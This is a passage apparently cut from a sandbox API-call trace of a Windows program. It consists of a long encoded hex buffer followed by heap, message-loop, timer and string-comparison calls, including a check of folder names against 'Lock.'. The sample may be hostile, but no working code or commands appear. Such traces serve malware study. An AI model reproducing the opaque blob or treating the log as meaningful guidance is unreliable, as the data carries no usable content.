ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 32 [0251.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.217] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0251.217] TranslateMessage (lpMsg=0x8bf970) returned 0 [0251.217] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0251.217] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0251.217] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0251.217] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0251.217] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.217] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0251.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0251.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0251.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Temporary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="emporary Internet Files", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.218] CompareStringW 